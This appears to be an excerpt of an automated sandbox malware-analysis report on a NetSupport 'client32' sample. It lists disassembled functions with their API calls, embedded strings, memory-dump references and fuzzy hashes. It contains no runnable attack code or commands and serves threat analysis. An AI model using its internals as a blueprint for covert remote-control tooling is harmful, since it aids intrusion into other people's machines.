                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890A82E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890A843
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: deque<T> too long
                                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                                        • Opcode ID: d90457c4577d6facbe999a04418f1f34ef87c3c249a09223b89f4ee29c65a279
                                                                                                                                        • Instruction ID: 19f1d9001287e65247e368b71f71878642f12829822b6e705c2eacccf62ad87d
                                                                                                                                        • Opcode Fuzzy Hash: d90457c4577d6facbe999a04418f1f34ef87c3c249a09223b89f4ee29c65a279
                                                                                                                                        • Instruction Fuzzy Hash: 4C41C276E04108AFDB14CE6CCC81AAEB7FAAFD0214B59C268D819E7305E634EA4187D0
                                                                                                                                        Function 688F77B0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 107COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: $CMD=ENCD$DATA=$ES=%d$body$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                        • API String ID: 269201875-1133135390
                                                                                                                                        • Opcode ID: 338b38b83cd4a9c06c9dd0656cfb8636e2213b0fe6af16d5047c6dfc196f35e3
                                                                                                                                        • Instruction ID: ab3800c373f6edf3b88292b45a52ff98af62f397cfb876bd08adca414b5dc24c
                                                                                                                                        • Opcode Fuzzy Hash: 338b38b83cd4a9c06c9dd0656cfb8636e2213b0fe6af16d5047c6dfc196f35e3
                                                                                                                                        • Instruction Fuzzy Hash: 2B3127796401297FE701DAA89C40EFFB37D9F92258F804158F814A3240DB21EA4687E5
                                                                                                                                        Function 110051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 110051CE
                                                                                                                                        • _memset.LIBCMT ref: 110051F0
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 11005204
                                                                                                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
                                                                                                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
                                                                                                                                        • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
                                                                                                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2755257978-4108050209
                                                                                                                                        • Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                        • Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
                                                                                                                                        • Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                        • Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51
                                                                                                                                        Function 68910520 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(6893CF98,27CEFB69), ref: 68910559
                                                                                                                                        • std::exception::exception.LIBCMT ref: 689105BB
                                                                                                                                          • Part of subcall function 6891400A: std::exception::_Copy_str.LIBCMT ref: 68914025
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 689105D0
                                                                                                                                          • Part of subcall function 689142DF: RaiseException.KERNEL32(?,?,688F439C,?,?,?,?,?,688F439C,?,68936630,?,00000000), ref: 68914321
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000), ref: 689105E1
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893CF98), ref: 689105FD
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893CF98,?,00000001), ref: 68910653
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Initialize$Copy_strEnterExceptionException@8LeaveRaiseThrowstd::exception::_std::exception::exception
                                                                                                                                        • String ID: Refcount.cpp$p < ep
                                                                                                                                        • API String ID: 4033003751-358336193
                                                                                                                                        • Opcode ID: b1bfca54900e02fda9726865dfb06d8b152de51faeabc7bee5762ff020aefd30
                                                                                                                                        • Instruction ID: 24398e16f75f853102a36c4431f48da083ea9d6d0869089d2423c4b5b02594ce
                                                                                                                                        • Opcode Fuzzy Hash: b1bfca54900e02fda9726865dfb06d8b152de51faeabc7bee5762ff020aefd30
                                                                                                                                        • Instruction Fuzzy Hash: 7D31B175808728DFCB21CF58C844B9EBBF5FB89718F80421AE89AA7340D372D540CB91
                                                                                                                                        Function 6892862E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 68928653
                                                                                                                                          • Part of subcall function 689281EE: Replicator::operator[].LIBCMT ref: 68928271
                                                                                                                                          • Part of subcall function 689281EE: DName::operator+=.LIBCMT ref: 68928279
                                                                                                                                        • DName::operator+.LIBCMT ref: 689286AC
                                                                                                                                        • DName::DName.LIBCMT ref: 68928704
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                        • API String ID: 834187326-2211150622
                                                                                                                                        • Opcode ID: f7c1244faa5b4152a60e4d94ff7bcfcb88bc610c7d11fa8c1564e358dc1749bd
                                                                                                                                        • Instruction ID: f778b802a6512f7023ec6842002f19139d4c526e3e0ca508d6f12c2c6d394c58
                                                                                                                                        • Opcode Fuzzy Hash: f7c1244faa5b4152a60e4d94ff7bcfcb88bc610c7d11fa8c1564e358dc1749bd
                                                                                                                                        • Instruction Fuzzy Hash: 23217F30654208DFCF25CF18D568AAD7BF8AB4A34CB848055E865EF766C731EA02CB41
                                                                                                                                        Function 688F5F20 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 68sleepwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,?), ref: 688F5F77
                                                                                                                                        • wsprintfA.USER32 ref: 688F5FB2
                                                                                                                                        • MessageBoxA.USER32(00000000,?,NetSupport,00000004), ref: 688F5FC7
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 688F5FFF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSleepVersionwsprintf
                                                                                                                                        • String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
                                                                                                                                        • API String ID: 1064562911-2508291834
                                                                                                                                        • Opcode ID: 2c0dec70025b8196a661027d5f40094f05a117aa03a06c12da8710a925425d1f
                                                                                                                                        • Instruction ID: 773f3b94b37094e14538bfd9111d8e49196e02179d14005229726c09dcfdcd0b
                                                                                                                                        • Opcode Fuzzy Hash: 2c0dec70025b8196a661027d5f40094f05a117aa03a06c12da8710a925425d1f
                                                                                                                                        • Instruction Fuzzy Hash: C221E772E08128DFDB30DBA4CE49B9D77B4EF85304F5005B9E90AA7580D7309D11CB50
                                                                                                                                        Function 68929FC7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • UnDecorator::UScore.LIBCMT ref: 68929FD1
                                                                                                                                        • DName::DName.LIBCMT ref: 68929FDD
                                                                                                                                          • Part of subcall function 68927CA8: DName::doPchar.LIBCMT ref: 68927CD9
                                                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 6892A01C
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A026
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A035
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A041
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A04E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                        • String ID: void
                                                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                                                        • Opcode ID: ce1dfee06bf85fcd9f6e97b673d7b7bbf9ac4e186a94ad92e676d2c944abae46
                                                                                                                                        • Instruction ID: b83c8532d89a66c40c4aac53131ca458d8790d6c37d35909e6684394a2b52a5b
                                                                                                                                        • Opcode Fuzzy Hash: ce1dfee06bf85fcd9f6e97b673d7b7bbf9ac4e186a94ad92e676d2c944abae46
                                                                                                                                        • Instruction Fuzzy Hash: 7C110275964204EFD704DF64C869FBD7BF4AB12318F844095D012BB2EADB30DA45CB41
                                                                                                                                        Function 689013C9 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 6890141D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901678
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689016C8
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901740
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890175B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: END_REC$MORE$RESULT$b
                                                                                                                                        • API String ID: 285166177-3141901015
                                                                                                                                        • Opcode ID: e0da5a95388461f450fe7d203fde4387b84e12d65de56304b3fa6604affedf5f
                                                                                                                                        • Instruction ID: e073b3ae562925e3c8543367316c615b96816d41e299f1c0dea11afa138fb55e
                                                                                                                                        • Opcode Fuzzy Hash: e0da5a95388461f450fe7d203fde4387b84e12d65de56304b3fa6604affedf5f
                                                                                                                                        • Instruction Fuzzy Hash: B68152B5D053699FDF20DFE89C40AFE76B4AF55308F84056EE44AA6201E7318B48CB96
                                                                                                                                        Function 689014C9 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 6890141D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901678
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689016C8
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 689016FB
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901712
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                                        • String ID: END_REC$MORE$RESULT$b
                                                                                                                                        • API String ID: 920729587-3141901015
                                                                                                                                        • Opcode ID: e5593658caf6fd5a32a498f24b721f9bc42f231c79fb67b9761a20c8ba02ac6c
                                                                                                                                        • Instruction ID: 1ebb101e1c312b0e0e1a9e80f8f8d8b2e758aa9b37b9c2d0804ee03e68eecc1f
                                                                                                                                        • Opcode Fuzzy Hash: e5593658caf6fd5a32a498f24b721f9bc42f231c79fb67b9761a20c8ba02ac6c
                                                                                                                                        • Instruction Fuzzy Hash: 3E8152B5D053699FDF20DFE89C40AFE76B4AF55308F84056EE44AA6201E7318B48CB96
                                                                                                                                        Function 688F6DF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F6DFD
                                                                                                                                        • #16.WSOCK32(688FA730,?,00000001,00000000,?,688FA730,?,00002000,,?,688FACF4,00000000,00000000,?,?,00000010), ref: 688F6E4C
                                                                                                                                        • WSASetLastError.WSOCK32(00002747,?,688FA730,?,00002000,,?,688FACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 688F6F25
                                                                                                                                        • WSASetLastError.WSOCK32(00002745,688FA730,?,00000001,00000000,?,688FA730,?,00002000,,?,688FACF4,00000000,00000000,?,?), ref: 688F6F36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_memset
                                                                                                                                        • String ID: $Content-Length:$HTTP/
                                                                                                                                        • API String ID: 536390146-1146010681
                                                                                                                                        • Opcode ID: 77fb3e30d3baf8ac8cafbb510605516fbaa3fc486063d401d4ef769257bf60b0
                                                                                                                                        • Instruction ID: c1cc47273c1c4216bb98ebc176cb3232d4de4709d00da6bd2f063310d427d945
                                                                                                                                        • Opcode Fuzzy Hash: 77fb3e30d3baf8ac8cafbb510605516fbaa3fc486063d401d4ef769257bf60b0
                                                                                                                                        • Instruction Fuzzy Hash: 07314C67B0C3066BEB01DA64DC59BAB32688F62388FD00A38FE6487541FB31D10789A1
                                                                                                                                        Function 68910F90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68910D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,68910F2B,27CEFB69,00000000,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D48
                                                                                                                                          • Part of subcall function 68910D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 68910D5B
                                                                                                                                          • Part of subcall function 68910D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6893CB4C,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D76
                                                                                                                                          • Part of subcall function 68910D40: _free.LIBCMT ref: 68910D84
                                                                                                                                          • Part of subcall function 68910D40: _malloc.LIBCMT ref: 68910D8C
                                                                                                                                          • Part of subcall function 68910D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?), ref: 68910D9F
                                                                                                                                          • Part of subcall function 68910D40: _free.LIBCMT ref: 68910DAF
                                                                                                                                          • Part of subcall function 68910970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 689109A6
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 689109C3
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 689109CD
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,socket), ref: 689109DB
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 689109E9
                                                                                                                                          • Part of subcall function 68910970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 689109F7
                                                                                                                                          • Part of subcall function 68910970: FreeLibrary.KERNEL32(00000000), ref: 68910A6C
                                                                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 68910FF6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ntohl), ref: 6891100C
                                                                                                                                        • _malloc.LIBCMT ref: 68911020
                                                                                                                                        • _free.LIBCMT ref: 689110E5
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 689110FA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
                                                                                                                                        • String ID: ntohl$ws2_32.dll
                                                                                                                                        • API String ID: 4086026317-4165132517
                                                                                                                                        • Opcode ID: 51e75394bff360df27eb73129d2d16eac5cac4da230b71e6f38303574b9b6b86
                                                                                                                                        • Instruction ID: 88f51382038e04a602d47fe7421d2ab531e8f58744f0932e5529782d60ffc822
                                                                                                                                        • Opcode Fuzzy Hash: 51e75394bff360df27eb73129d2d16eac5cac4da230b71e6f38303574b9b6b86
                                                                                                                                        • Instruction Fuzzy Hash: AE414F75D0C21D9BDB24DF24CC406AAB3B9BB66604F5094A9D8DAA7200EF35DA84CF90
